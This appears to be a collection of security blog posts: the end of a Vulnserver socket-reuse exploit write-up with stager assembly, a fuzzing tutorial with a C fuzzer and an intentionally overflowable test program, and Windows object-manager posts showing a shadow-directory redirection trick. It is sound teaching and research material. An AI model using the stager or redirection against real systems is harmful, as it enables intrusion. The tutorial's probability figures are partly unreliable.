This basically just loads the socket descriptor value stored in EAX into the location pointed to by [ESP]. We can verify this by following ESP in the stack, which currently points to address 0x011CF9E0



Next, we will load the address of the socket descriptor into EAX. Since ASLR is enabled, we will need to do some math, and we will use ESP's address as a reference point.


We know that the socket descriptor is located at address 0x00EEFB68 ([EBP-420]). This means that we will need to do the following:


 0x00EEFB68 (socket descriptor) - 0x00EEF9E0 (ESP) = 188 (in hex)


Great... so we will need to add 188 to ESP. We will do this by pushing ESP onto the stack, popping it into EAX, and then adding 188 to EAX. If our calculation is correct, we should have the socket descriptor address (0x00EEFB68) loaded into EAX.


We run the following instructions:


PUSH ESP

POP EAX

ADD AX, 188

 

And we can see that address 0x00EEFB68 is now loaded in EAX, which points to the socket descriptor value of 0x00000050, as shown in the stack.



Great...now we have the socket descriptor easily accessible!


Re-aligning ESP


At this point, we will have to re-align ESP so that we don't arbitrarily overlap with our first stage instructions. As we push more instructions to the stack, especially in a small address space, we risk overlapping our first stage with ESP.

That said, we need to move our ESP below where our first stage will be loaded.

We use the following instructions to adjust ESP:

SUB ESP, 6C                         ;SUB 108 from ESP

This makes ESP points to 0x00EEF974

***Note that towards the end of the exploit development, I found that ESP needed to point directly below the recv() parameters. That meant I had to adjust ESP and only subtracted 64, which pointed it to address 0x00EEF97C instead.


At this point, we have accomplished the following:

1. Located the address for the recv() function
2. Located the address that holds the socket descriptor value
3. Loaded the socket descriptor value to EAX
4. Aligned the stack to ensure our first stage does not overlap with ESP

Now we are ready to populate the parameters for our recv() function call.

Note that we need 4 parameters for the this function call pushed to the stack in reverse order.


0x1 - Param #4 (Flags)

Since we are not setting any flags, we will set this parameter to NULL.

Using the EBX register...we zero it out using XOR instruction before pushing it to the stack

XOR EBX, EBX
PUSH EBX


0x2 - Param #3 (Buffer Size)

For the buffer size, I picked about 1024 bytes of buffer space which is a lot more than what we need.

Utilizing the EBX register again which is already set to zero...we will add 400 (in hex) to it.

ADD BH, 4
PUSH EBX


0x3 - Param # 2 (Buffer Location)

I initially pointed the buffer location to the beginning of the Cs (0x00EEF9E4); however, it didn't work, so I had to point it directly after the four parameters. In this case, the buffer location has to point to address 0x00EEF97C


We can use the ESP address again... load it into EBX, then do some math; in this case I had to add 120 (hex 78) to it

PUSH ESP
POP EBX
ADD EBX, 78
PUSH EBX



0x4 - Param #1 (Socket Descriptor)

Finally, for the socket descriptor we will need to push the value EAX points to (not the address held in EAX itself)

EAX still points to 0x00EEFB68, which holds the socket descriptor value of 0x00000050


We can simply push the value EAX points to using the following instruction:

PUSH DWORD PTR DS:[EAX]


...and we are done with the parameters. 

At this point, we should have the following parameters. 

Socket descriptor = 0x00000050

Buffer location = beginning of our C's (NOTE: this was adjusted to address 0x00EEF97C)

Buffer size = 400 (1024 in dec)

Flags = 0



Calling the RECV()

With the parameters set, we are now ready to call our recv() function. Note that the recv() function is at address 0x0040252C


As you can see, the recv() address contains null bytes which will need to be removed. I learned something new from https://purpl3f0xsec.tech/2019/09/04/Vulnserver-KSTET-Socket-Reuse.html about how to remove these null bytes.

 

We simply use a shifted version of the address: drop the leading null byte and append 90 as the lowest byte, giving 0x40252C90 instead of 0x0040252C

 

So we move this arbitrary address to EAX:

 

MOV EAX, 40252C90

 

Then we shift it right by 8 bits, which removes the last 8 bits (0x90) and fills the top 8 bits with 00


SHR EAX, 8

 

Finally, we simply CALL EAX

 

Here, just before we execute CALL EAX, we can see that EAX currently holds the recv() address



That is the entire first stage...and we update our POC as shown below



We fire up the exploit one more time, step through the stager, and we can see that we have all 4 parameters ready to go… they are followed by the address where our payload will be loaded.


Second Stage / Reverse Shell

With our RECV() function ready, we can send our second stage payload.

We update our POC and see if we can add the Ds to memory.

Note that I added a sleep(5) in between the first and second stages. This ensures that our recv() function is ready before we send the second stage payload.


Here we can see that we have successfully loaded our Ds to memory at address 0x011EFD7C or 0x00EEFD7C (note ASLR).


We then replace the Ds with an actual reverse shell, fire up the exploit, and we get a reverse shell!





Thank you for reading.

Fuzzing Like A Caveman 3: Trying to Somewhat Understand The Importance Code Coverage

By: h0mbre
26 May 2020 at 04:00

Introduction

In this episode of ‘Fuzzing like a Caveman’, we’ll be continuing on our by noob for noobs fuzzing journey and trying to wrap our little baby fuzzing brains around the concept of code coverage and why its so important. As far as I know, code coverage is, at a high-level, the attempt made by fuzzers to track/increase how much of the target application’s code is reached by the fuzzer’s inputs. The idea being that the more code your fuzzer inputs reach, the greater the attack surface, the more comprehensive your testing is, and other big brain stuff that I don’t understand yet.

I’ve been working on my pwn skills, but taking short breaks for sanity to write some C and watch some @gamozolabs streams. @gamozolabs broke down the importance of code coverage during one of these streams, and I cannot for the life of me track down the clip, but I remembered it vaguely enough to set up some test cases just for my own testing to demonstrate why “dumb” fuzzers are so disadvantaged compared to code-coverage-guided fuzzers. Get ready for some (probably incorrect 🤣) 8th grade probability theory. By the end of this blog post, we should be able to at least understand, broadly, how state of the art fuzzers worked in 1990.

Our Fuzzer

We have this beautiful, error free, perfectly written, single-threaded jpeg mutation fuzzer that we’ve ported to C from our previous blog posts and tweaked a bit for the purposes of our experiments here.

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h> 
#include <fcntl.h>

int crashes = 0;

struct ORIGINAL_FILE {
    char * data;
    size_t length;
};

struct ORIGINAL_FILE get_data(char* fuzz_target) {

    FILE *fileptr;
    char *clone_data;
    long filelen;

    // open file in binary read mode
    // jump to end of file, get length
    // reset pointer to beginning of file
    fileptr = fopen(fuzz_target, "rb");
    if (fileptr == NULL) {
        printf("[!] Unable to open fuzz target, exiting...\n");
        exit(1);
    }
    fseek(fileptr, 0, SEEK_END);
    filelen = ftell(fileptr);
    rewind(fileptr);

    // cast malloc as char ptr
    // ptr offset * sizeof char = data in .jpeg
    clone_data = (char *)malloc(filelen * sizeof(char));

    // get length for struct returned
    size_t length = filelen * sizeof(char);

    // read in the data
    fread(clone_data, filelen, 1, fileptr);
    fclose(fileptr);

    struct ORIGINAL_FILE original_file;
    original_file.data = clone_data;
    original_file.length = length;

    return original_file;
}

void create_new(struct ORIGINAL_FILE original_file, size_t mutations) {

    //
    //----------------MUTATE THE BITS-------------------------
    //
    int* picked_indexes = (int*)malloc(sizeof(int)*mutations);
    for (int i = 0; i < (int)mutations; i++) {
        picked_indexes[i] = rand() % original_file.length;
    }

    char * mutated_data = (char*)malloc(original_file.length);
    memcpy(mutated_data, original_file.data, original_file.length);

    for (int i = 0; i < (int)mutations; i++) {
        // pick a random replacement byte for the chosen index
        int rand_byte = rand() % 256;

        mutated_data[picked_indexes[i]] = (char)rand_byte;
    }

    //
    //---------WRITING THE MUTATED BITS TO NEW FILE-----------
    //
    FILE *fileptr;
    fileptr = fopen("mutated.jpeg", "wb");
    if (fileptr == NULL) {
        printf("[!] Unable to open mutated.jpeg, exiting...\n");
        exit(1);
    }
    // buffer to be written from,
    // size in bytes of elements,
    // how many elements,
    // where to stream the output to :)
    fwrite(mutated_data, 1, original_file.length, fileptr);
    fclose(fileptr);
    free(mutated_data);
    free(picked_indexes);
}

void exif(int iteration) {
    
    //fileptr = popen("exiv2 pr -v mutated.jpeg >/dev/null 2>&1", "r");
    char* file = "vuln";
    char* argv[3];
    argv[0] = "vuln";
    argv[1] = "mutated.jpeg";
    argv[2] = NULL;
    pid_t child_pid;
    int child_status;

    child_pid = fork();
    if (child_pid == 0) {
        
        // this means we're the child process
        int fd = open("/dev/null", O_WRONLY);

        // dup both stdout and stderr and send them to /dev/null
        dup2(fd, 1);
        dup2(fd, 2);
        close(fd);
        

        execvp(file, argv);
        // shouldn't return, if it does, we have an error with the command
        printf("[!] Unknown command for execvp, exiting...\n");
        exit(1);
    }
    else {
        // this is run by the parent process
        do {
            pid_t tpid = waitpid(child_pid, &child_status, WUNTRACED |
             WCONTINUED);
            if (tpid == -1) {
                printf("[!] Waitpid failed!\n");
                perror("waitpid");
            }
            if (WIFEXITED(child_status)) {
                //printf("WIFEXITED: Exit Status: %d\n", WEXITSTATUS(child_status));
            } else if (WIFSIGNALED(child_status)) {
                crashes++;
                int exit_status = WTERMSIG(child_status);
                printf("\r[>] Crashes: %d", crashes);
                fflush(stdout);
                char command[50];
                sprintf(command, "cp mutated.jpeg ccrashes/%d.%d", iteration, 
                exit_status);
                system(command);
            } else if (WIFSTOPPED(child_status)) {
                printf("WIFSTOPPED: Exit Status: %d\n", WSTOPSIG(child_status));
            } else if (WIFCONTINUED(child_status)) {
                printf("WIFCONTINUED: Exit Status: Continued.\n");
            }
        } while (!WIFEXITED(child_status) && !WIFSIGNALED(child_status));
    }
}

int main(int argc, char** argv) {

    if (argc < 3) {
        printf("Usage: ./cfuzz <valid jpeg> <num of fuzz iterations>\n");
        printf("Usage: ./cfuzz Canon_40D.jpg 10000\n");
        exit(1);
    }

    // get our random seed
    srand((unsigned)time(NULL));

    char* fuzz_target = argv[1];
    struct ORIGINAL_FILE original_file = get_data(fuzz_target);
    printf("[>] Size of file: %ld bytes.\n", original_file.length);
    size_t mutations = (original_file.length - 4) * .02;
    printf("[>] Flipping up to %ld bytes.\n", mutations);

    int iterations = atoi(argv[2]);
    printf("[>] Fuzzing for %d iterations...\n", iterations);
    for (int i = 0; i < iterations; i++) {
        create_new(original_file, mutations);
        exif(i);
    }
    
    printf("\n[>] Fuzzing completed, exiting...\n");
    return 0;
}

Not going to spend a lot of time on the fuzzer’s features (what features?) here, but some important things about the fuzzer code:

  • it takes a file as input and copies the bytes from the file into a buffer
  • it calculates the length of the buffer in bytes, and then mutates 2% of the bytes by randomly overwriting them with arbitrary bytes
  • the function responsible for the mutation, create_new, doesn’t keep track of which byte indexes have already been mutated, so the same index could be chosen for mutation multiple times; in practice, then, the fuzzer mutates up to 2% of the bytes.

Small Detour, I Apologize

We only have one mutation method here to keep things super simple. In doing so, I actually learned something really useful that I hadn’t clearly thought out previously. In a previous post I wondered, embarrassingly, aloud and in print, how different random bit flipping was from random byte overwriting. Well, it turns out, they are super different. Let’s take a minute to see how.

Let’s say we’re mutating an array of bytes called bytes. We’re mutating index 5. bytes[5] == \x41 (65 in decimal) in the unmutated, pristine original file. If we only bit flip, we are super limited in how much we can mutate this byte. 65 is 01000001 in binary. Let’s just go through at see how much it changes from arbitrarily flipping one bit:

  • Flipping first bit: 11000001 = 193,
  • Flipping second bit: 00000001 = 1,
  • Flipping third bit: 01100001 = 97,
  • Flipping fourth bit: 01010001 = 81,
  • Flipping fifth bit: 01001001 = 73,
  • Flipping sixth bit: 01000101 = 69,
  • Flipping seventh bit: 01000011 = 67, and
  • Flipping eighth bit: 01000000 = 64.

As you can see, we’re locked in to a severely limited amount of possibilities.

So for this program, I’ve opted to replace this mutation method with one that instead just substitutes a random byte instead of a bit within the byte.
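
To make the difference concrete, here are the two strategies side by side as tiny helper functions. This is just an illustration (the function names are mine); the fuzzer above only implements the second one:

// bit flip: the mutated byte can only ever become one of 8 values,
// each a single bit away from the original
unsigned char flip_random_bit(unsigned char b) {
    return b ^ (unsigned char)(1 << (rand() % 8));
}

// byte overwrite: the mutated byte can become any of the 256 possible
// values, which is what create_new() above does
unsigned char overwrite_random_byte(unsigned char b) {
    (void)b;
    return (unsigned char)(rand() % 256);
}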

Vulnerable Program

I wrote a simple cartoonish program to demonstrate how hard it can be for “dumb” fuzzers to find bugs. Imagine a target application that has several decision trees in the disassembly map view of the binary. The application performs 2-3 checks on the input to see if it meets certain criteria before passing the input to some sort of vulnerable function. Here is what I mean:

Our program does this exact thing: it retrieves the bytes of an input file and checks the bytes at an index 1/3rd of the file length, 1/2 of the file length, and 2/3 of the file length to see if the bytes in those positions match some hardcoded values (arbitrary). If all the checks are passed, the application copies the byte buffer into a small buffer, causing a segfault to simulate a vulnerable function. Here is our program:

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>

struct ORIGINAL_FILE {
    char * data;
    size_t length;
};

struct ORIGINAL_FILE get_bytes(char* fileName) {

    FILE *filePtr;
    char* buffer;
    long fileLen;

    filePtr = fopen(fileName, "rb");
    if (!filePtr) {
        printf("[>] Unable to open %s\n", fileName);
        exit(-1);
    }
    
    if (fseek(filePtr, 0, SEEK_END)) {
        printf("[>] fseek() failed, wtf?\n");
        exit(-1);
    }

    fileLen = ftell(filePtr);
    if (fileLen == -1) {
        printf("[>] ftell() failed, wtf?\n");
        exit(-1);
    }

    errno = 0;
    rewind(filePtr);
    if (errno) {
        printf("[>] rewind() failed, wtf?\n");
        exit(-1);
    }

    long trueSize = fileLen * sizeof(char);
    printf("[>] %s is %ld bytes.\n", fileName, trueSize);
    buffer = (char *)malloc(fileLen * sizeof(char));
    fread(buffer, fileLen, 1, filePtr);
    fclose(filePtr);

    struct ORIGINAL_FILE original_file;
    original_file.data = buffer;
    original_file.length = trueSize;

    return original_file;
}

void check_one(char* buffer, int check) {

    if (buffer[check] == '\x6c') {
        return;
    }
    else {
        printf("[>] Check 1 failed.\n");
        exit(-1);
    }
}

void check_two(char* buffer, int check) {

    if (buffer[check] == '\x57') {
        return;
    }
    else {
        printf("[>] Check 2 failed.\n");
        exit(-1);
    }
}

void check_three(char* buffer, int check) {

    if (buffer[check] == '\x21') {
        return;
    }
    else {
        printf("[>] Check 3 failed.\n");
        exit(-1);
    }
}

void vuln(char* buffer, size_t length) {

    printf("[>] Passed all checks!\n");
    char vulnBuff[20];

    memcpy(vulnBuff, buffer, length);

}

int main(int argc, char *argv[]) {
    
    if (argc < 2 || argc > 2) {
        printf("[>] Usage: vuln example.txt\n");
        exit(-1);
    }

    char *filename = argv[1];
    printf("[>] Analyzing file: %s.\n", filename);

    struct ORIGINAL_FILE original_file = get_bytes(filename);

    int checkNum1 = (int)(original_file.length * .33);
    printf("[>] Check 1 no.: %d\n", checkNum1);

    int checkNum2 = (int)(original_file.length * .5);
    printf("[>] Check 2 no.: %d\n", checkNum2);

    int checkNum3 = (int)(original_file.length * .67);
    printf("[>] Check 3 no.: %d\n", checkNum3);

    check_one(original_file.data, checkNum1);
    check_two(original_file.data, checkNum2);
    check_three(original_file.data, checkNum3);
    
    vuln(original_file.data, original_file.length);
    

    return 0;
}

Keep in mind that this is only one type of criteria; there are several different types of criteria that exist in binaries. I selected this one because the checks are so specific it can demonstrate, in an exaggerated way, how hard it can be to reach new code purely by randomness.

Our sample file, which we’ll mutate and feed to this vulnerable application is still the same file from the previous posts, the Canon_40D.jpg file with exif data.

h0mbre@pwn:~/fuzzing$ file Canon_40D.jpg 
Canon_40D.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=11, manufacturer=Canon, model=Canon EOS 40D, orientation=upper-left, xresolution=166, yresolution=174, resolutionunit=2, software=GIMP 2.4.5, datetime=2008:07:31 10:38:11, GPS-Data], baseline, precision 8, 100x68, frames 3
h0mbre@pwn:~/fuzzing$ ls -lah Canon_40D.jpg 
-rw-r--r-- 1 h0mbre h0mbre 7.8K May 25 06:21 Canon_40D.jpg

The file is 7958 bytes long. Let’s feed it to the vulnerable program and see what indexes are chosen for the checks:

h0mbre@pwn:~/fuzzing$ vuln Canon_40D.jpg 
[>] Analyzing file: Canon_40D.jpg.
[>] Canon_40D.jpg is 7958 bytes.
[>] Check 1 no.: 2626
[>] Check 2 no.: 3979
[>] Check 3 no.: 5331
[>] Check 1 failed.

So we can see that indexes 2626, 3979, and 5331 were chosen for testing and that the file failed the first check as the byte at that position wasn’t \x6c.

Experiment 1: Passing Only One Check

Let’s take away checks two and three and see how our dumb fuzzer performs against the binary when we only have to pass one check.

I’ll comment out checks two and three:

check_one(original_file.data, checkNum1);
//check_two(original_file.data, checkNum2);
//check_three(original_file.data, checkNum3);
    
vuln(original_file.data, original_file.length);

And so now, we’ll take our unaltered jpeg, which naturally does not pass the first check, and have our fuzzer mutate it and send it to the vulnerable application hoping for crashes. Remember that the fuzzer mutates up to 159 bytes of the 7958 bytes total each fuzzing iteration. If the fuzzer randomly inserts an \x6c into index 2626, we will pass the first check and execution will pass to the vulnerable function and cause a crash. Let’s run our dumb fuzzer 1 million times and see how many crashes we get.

h0mbre@pwn:~/fuzzing$ ./fuzzer Canon_40D.jpg 1000000
[>] Size of file: 7958 bytes.
[>] Flipping up to 159 bytes.
[>] Fuzzing for 1000000 iterations...
[>] Crashes: 88
[>] Fuzzing completed, exiting...

So out of 1 million iterations, we got 88 crashes. So on about 0.0088% of our iterations, we met the criteria to pass check 1 and hit the vulnerable function. Let’s double check our crash to make sure there’s no error in any of our code (I fuzzed the vulnerable program with all checks enabled in QEMU mode (to simulate not having source code) with AFL for 14 hours and wasn’t able to crash the program so I hope there are no bugs that I don’t know about 😬).

h0mbre@pwn:~/fuzzing/ccrashes$ vuln 998636.11 
[>] Analyzing file: 998636.11.
[>] 998636.11 is 7958 bytes.
[>] Check 1 no.: 2626
[>] Check 2 no.: 3979
[>] Check 3 no.: 5331
[>] Passed all checks!
Segmentation fault

So feeding the vulnerable program one of the crash inputs actually does crash it. Cool.

Disclaimer: Here is where some math comes in, and I’m not guaranteeing this math is correct. I even sought help from some really smart people like @Firzen14 and am still not 100% confident in my math lol. But! I did go ahead and simulate the systems involved here hundreds of millions of times and the results of the empirical data were super close to what the possibly broken math said it should be. So, if it’s not correct, it’s at least close enough to prove the points I’m trying to demonstrate.

Let’s try and figure out how likely it is that we pass the first check and get a crash. The first obstacle we need to pass is that we need index 2626 to be chosen for mutation. If it’s not mutated, we know that by default it’s not going to hold the value we need it to hold and we won’t pass the check. Since we’re selecting a byte to be mutated 159 times, and we have 7958 bytes to choose from, the odds of us mutating the byte at index 2626 is probably something close to 159/7958, which is 0.0199798944458407.

The second obstacle, is that we need it to hold exactly \x6c and the fuzzer has 255 byte values to choose from. So the chances of this byte, once selected for mutation, to be mutated to exactly \x6c is 1/255, which is 0.003921568627451.

So the chances of both of these things occurring should be close to 0.0199798944458407 * 0.003921568627451, (about .0078%), which if you multiply by 1 million, would have you at around 78 crashes. We were pretty close to that with 88. Given that we’re doing this randomly, there is going to be some variance.

So in conclusion for Experiment 1, we were able to reliably pass this one type of check and reach our vulnerable function with our dumb fuzzer. Let’s see how things change when add a second check.

Experiment 2: Passing Two Checks

Here is where the math becomes an even bigger problem; however, as I said previously, I ran a simulation of the events hundreds of millions of times and was pretty close to what I thought should be the math.

Having the byte value be correct is fairly straightforward I think and is always going to be 1/255, but having both indexes selected for mutation with only 159 choices available tripped me up. I ran a simulator to see how often it occurred that both indexes were selected for mutation and let it run for a while, after over 390 million iterations, it happened around 155,000 times total.

<snip>
Occurences: 155070    Iterations: 397356879
Occurences: 155080    Iterations: 397395052
Occurences: 155090    Iterations: 397422769
<snip>

155090/397422769 == .0003902393423261565. I would think the math is something close to (159/7958) * (158/7958), which would end up being .0003966855142551934. So you can see that they’re pretty close, given some random variance, they’re not too far off. This should be close enough to demonstrate the problem.
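
For reference, here is a minimal sketch of the kind of simulator described above: pick 159 indexes at random (with replacement, just like the fuzzer) out of 7958 and count how often both check indexes end up in the picked set. The iteration count is arbitrary; adjust it to taste.

#include <stdio.h>
#include <stdlib.h>
#include <time.h>

int main(void) {
    const int file_len = 7958, picks = 159;
    const int idx_one = 2626, idx_two = 3979;
    long long occurrences = 0, iterations = 10000000LL;

    srand((unsigned)time(NULL));
    for (long long i = 0; i < iterations; i++) {
        int hit_one = 0, hit_two = 0;
        for (int p = 0; p < picks; p++) {
            int idx = rand() % file_len;
            if (idx == idx_one) hit_one = 1;
            if (idx == idx_two) hit_two = 1;
        }
        if (hit_one && hit_two) occurrences++;
    }
    printf("Occurrences: %lld    Iterations: %lld\n", occurrences, iterations);
    return 0;
}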

Now that we have to pass two checks, we can mathematically summarize the odds of this happening with our dumb fuzzer as follows:

((159/7958) * (1/255)) == odds to pass first check
odds to pass first check * (158/7958) == odds to pass first check and have second index targeted for mutation
odds to pass first check * ((158/7958) * (1/255)) == odds to have second index targeted for mutation and hold the correct value
((159/7958) * (1/255)) * ((158/7958) * (1/255)) == odds to pass both checks
((0.0199798944458407 * 0.003921568627451) * (0.0198542347323448 * 0.003921568627451)) == 6.100507716342904e-9

So the odds of us getting both indexes selected for mutation and having both indexes mutated to hold the needed value is around .000000006100507716342904, which is .0000006100507716342904%.

For one check enabled, we should’ve expected ONE crash every ~12,820 iterations.

For two checks enabled, we should expect ONE crash every ~163 million iterations.

This is quite the problem. Our fuzzer would need to run for a very long time to reach that many iterations on average. As written and performing in a VM, the fuzzer does roughly 1,600 iterations a second. It would take me about 28 hours to reach 163 million iterations. You can see how our chances of finding the bug decreased exponentially with just one more check enabled. Imagine a third check being added!

How Code Coverage Tracking Can Help Us

If our fuzzer was able to track code coverage, we could turn this problem into something much more manageable.

Generically, a code coverage tracking system in our fuzzer would keep track of what inputs reached new code in the application. There are many ways to do this. Sometimes when source code is available to you, you can recompile the binaries with instrumentation added that informs the fuzzer when new code is reached, there is emulation, etc. @gamozolabs has a really cool Windows userland code coverage system that leverages an extremely fast debugger that sets millions of breakpoints in a target binary and slowly removes breakpoints as they are reached called ‘mesos’. Once your fuzzer becomes aware that a mutated input reached new code, it would save that input off so that it can be re-used and mutated further to reach even more code. That is a very simple explanation, but hopefully it paints a clear picture.
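
To make the feedback-loop idea concrete, here is a rough sketch in C. Everything here is hypothetical: run_target is a stand-in for whatever instrumentation, emulation or breakpoint-counting you would actually use, and a real fuzzer would keep a whole queue of interesting inputs rather than a single base input.

#include <stdlib.h>
#include <string.h>

// hypothetical coverage oracle: run the target on the input and return some
// measure of how much code was reached (edges, breakpoints hit, etc.)
typedef int (*coverage_fn)(const char *data, size_t len);

void coverage_guided_loop(char *base, size_t len, int iterations, coverage_fn run_target) {
    int best_coverage = run_target(base, len);
    char *candidate = (char *)malloc(len);

    for (int i = 0; i < iterations; i++) {
        // mutate a copy of the current base input, same strategy as create_new()
        memcpy(candidate, base, len);
        size_t mutations = (size_t)(len * .02);
        for (size_t m = 0; m < mutations; m++)
            candidate[rand() % len] = (char)(rand() % 256);

        int coverage = run_target(candidate, len);
        if (coverage > best_coverage) {
            // new code reached: keep this input as the new base so future
            // mutations start from something that already got further
            best_coverage = coverage;
            memcpy(base, candidate, len);
        }
    }
    free(candidate);
}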

I haven’t yet implemented a code coverage technique for the fuzzer, but we can easily simulate one. Let’s say our fuzzer was able, 1 out of ~13,000 times, to pass the first check and reach that second check in the program.

The first time the input reached this second check, it would be considered new code coverage. As a result, our now smart fuzzer would save that input off as it caused new code to be reached. This input would then be fed back through the mutator and hopefully reach the same new code again with the added possibility of reaching even more code.

Let’s demonstrate this. Let’s doctor our file Canon_40D.jpg such that the byte at the 2626 index is \x6c, and feed it through to our vulnerable application.
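
One way to produce that altered file is a trivial patcher along these lines (just a sketch; it assumes you have already copied Canon_40D.jpg to Canon_altered.jpg):

#include <stdio.h>

int main(void) {
    FILE *f = fopen("Canon_altered.jpg", "r+b");   // pre-made copy of Canon_40D.jpg
    if (f == NULL) { perror("fopen"); return 1; }
    fseek(f, 2626, SEEK_SET);                      // index used by check_one()
    fputc(0x6c, f);                                // the value check_one() expects
    fclose(f);
    return 0;
}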

h0mbre@pwn:~/fuzzing$ vuln Canon_altered.jpg 
[>] Analyzing file: Canon_altered.jpg.
[>] Canon_altered.jpg is 7958 bytes.
[>] Check 1 no.: 2626
[>] Check 2 no.: 3979
[>] Check 2 failed.

As you can see, we passed the first check and failed on the second check. Let’s use this Canon_altered.jpg file now as our base input for mutation, simulating the fact that we have code coverage tracking in our fuzzer, and see how many crashes we get when testing against only two checks total.

h0mbre@pwn:~/fuzzing$ ./fuzzer Canon_altered.jpg 1000000
[>] Size of file: 7958 bytes.
[>] Flipping up to 159 bytes.
[>] Fuzzing for 1000000 iterations...
[>] Crashes: 86
[>] Fuzzing completed, exiting...

So by using the file that got us increased code coverage, ie it passed the first check, as a base file and sending it back through the mutator, we were able to pass the second check 86 times. We essentially took that exponentially hard problem we had earlier and turned it back into our original problem of only needing to pass one check. There are a bunch of other considerations that real fuzzers would have to take into account but I’m just trying to plainly demonstrate how it helps reduce the exponential problem into a more manageable one.

We reduced our ((0.0199798944458407 * 0.003921568627451) * (0.0198542347323448 * 0.003921568627451)) == 6.100507716342904e-9 problem to something closer to (0.0199798944458407 * 0.003921568627451), which is a huge win for us.

Some nuance here is that feeding the altered file back through the mutation process could do a few things. It could remutate the byte at index 2626 and then we wouldn’t even pass the first check. It could mutate the file so much (remember, it is already up to 2% different than a valid jpeg from the first round of mutation) that the vulnerable application flat out rejects the input and we waste fuzz cycles.

So there are a lot of other things to consider, but hopefully this plainly demonstrates how code-coverage helps fuzzers complete a more comprehensive test of a target binary.

Conclusion

There are a lot of resources out there on different code coverage techniques; definitely follow up and read more on the subject if it interests you. @carste1n has a great series where he incrementally improves a fuzzer, you can catch the latest article here: https://carstein.github.io/2020/05/21/writing-simple-fuzzer-4.html

At some time in the future we can add some code coverage logic to our dumb fuzzer from this article and we can use the vulnerable program as a sort of benchmark to judge the effectiveness of a code coverage technique.

Some interesting notes, I fuzzed the vulnerable application with all three checks enabled with AFL for about 13 hours and wasn’t able to crash it! I’m not sure why it was so difficult. With only two checks enabled, AFL was able to find the crash very quickly. Maybe there was something wrong with my testing, I’m not quite sure.

Until next time!

OBJ_DONT_REPARSE is (mostly) Useless.

By: tiraniddo
23 May 2020 at 10:21
Continuing a theme from the last blog post, I think it's great that the two additional OBJECT_ATTRIBUTE flags were documented as a way of mitigating symbolic link attacks. While OBJ_IGNORE_IMPERSONATED_DEVICEMAP is pretty useful, the other flag, OBJ_DONT_REPARSE isn't, at least not for protecting file system access.

To quote the documentation, OBJ_DONT_REPARSE does the following:

"If this flag is set, no reparse points will be followed when parsing the name of the associated object. If any reparses are encountered the attempt will fail and return an STATUS_REPARSE_POINT_ENCOUNTERED result. This can be used to determine if there are any reparse points in the object's path, in security scenarios."

This seems pretty categorical, if any reparse point is encountered then the name parsing stops and STATUS_REPARSE_POINT_ENCOUNTERED is returned. Let's try it out in PS and open the notepad executable file.

PS> Get-NtFile \??\c:\windows\notepad.exe -ObjectAttributes DontReparse
Get-NtFile : (0xC000050B) - The object manager encountered a reparse point while retrieving an object.

Well, that's not what you might expect: there should be no reparse points to access notepad, so what went wrong? Well, you're assuming that the documentation meant NTFS reparse points, when it really meant all reparse points. The C: drive symbolic link is still a reparse point, just for the Object Manager. Therefore just accessing a drive path using this Object Attribute flag fails. Still, this does mean that it will also protect you from Registry Symbolic Links, as those also use a Reparse Point.
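
You can see the same failure from native code as well. Here's a rough sketch using NtOpenFile (not from the original post): it assumes winternl.h and linking against ntdll, and defines OBJ_DONT_REPARSE manually in case the headers in use don't expose it.

#include <stdio.h>
#include <windows.h>
#include <winternl.h>
#pragma comment(lib, "ntdll")

#ifndef OBJ_DONT_REPARSE
#define OBJ_DONT_REPARSE 0x00001000
#endif

int main(void) {
    UNICODE_STRING name;
    OBJECT_ATTRIBUTES oa;
    IO_STATUS_BLOCK iosb;
    HANDLE handle = NULL;

    RtlInitUnicodeString(&name, L"\\??\\C:\\Windows\\notepad.exe");
    InitializeObjectAttributes(&oa, &name, OBJ_DONT_REPARSE, NULL, NULL);

    // Fails with STATUS_REPARSE_POINT_ENCOUNTERED (0xC000050B) because the
    // C: drive letter is itself an Object Manager symbolic link.
    NTSTATUS status = NtOpenFile(&handle, FILE_READ_ATTRIBUTES, &oa, &iosb,
                                 FILE_SHARE_READ, 0);
    printf("NtOpenFile returned 0x%08X\n", (unsigned int)status);
    return 0;
}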

I'm assuming this flag wasn't introduced for file access at all, but instead for named kernel objects where encountering a Symbolic Link is usually less of a problem. Unlike OBJ_IGNORE_IMPERSONATED_DEVICEMAP I can't pinpoint a specific vulnerability this flag was associated with, so I can't say for certain why it was introduced. Still, it's slightly annoying especially considering there is an IO Manager specific flag, IO_STOP_ON_SYMLINK which does what you'd want to avoid file system symbolic links but that can only be accessed in kernel mode with IoCreateFileEx.

Not that this flag completely protects against Object Manager redirection attacks. It doesn't prevent abuse of shadow directories for example which can be used to redirect path lookups.

PS> $d = Get-NtDirectory \Device
PS> $x = New-NtDirectory \BaseNamedObjects\ABC -ShadowDirectory $d
PS> $f = Get-NtFile \BaseNamedObjects\ABC\HarddiskVolume3\windows\notepad.exe -ObjectAttributes DontReparse
PS> $f.FullPath
\Device\HarddiskVolume3\Windows\notepad.exe

Oh well...

Silent Exploit Mitigations for the 1%

By: tiraniddo
22 May 2020 at 23:59
With the accelerated release schedule of Windows 10 it's common for new features to be regularly introduced. This is especially true of features to mitigate some poorly designed APIs or easily misused behavior. The problem with many of these mitigations is they're regularly undocumented, or at least not exposed through the common Win32 APIs. This means that while Microsoft can be happy and prevent their own code from being vulnerable, they leave third party developers to get fucked.

One example of these silent mitigations are the additional OBJECT_ATTRIBUTE flags OBJ_IGNORE_IMPERSONATED_DEVICEMAP and OBJ_DONT_REPARSE which were finally documented, in part because I said it'd be nice if they did so. Of course, it only took 5 years to document them since they were introduced to fix bugs I reported. I guess that's pretty speedy in Microsoft's world. And of course they only help you if you're using the system call APIs which, let's not forget, are only partially documented.

While digging around in Windows 10 2004 (ugh... really, it's just confusing), and probably reminded by Alex Ionescu at some point, I noticed Microsoft have introduced another mitigation which is only available using an undocumented system call and not via any exposed Win32 API. So I thought, I should document it.

UPDATE (2020-04-23): According to @FireF0X this was backported to all supported OS's. So it's a security fix important enough to backport but not tell anyone about. Fantastic.

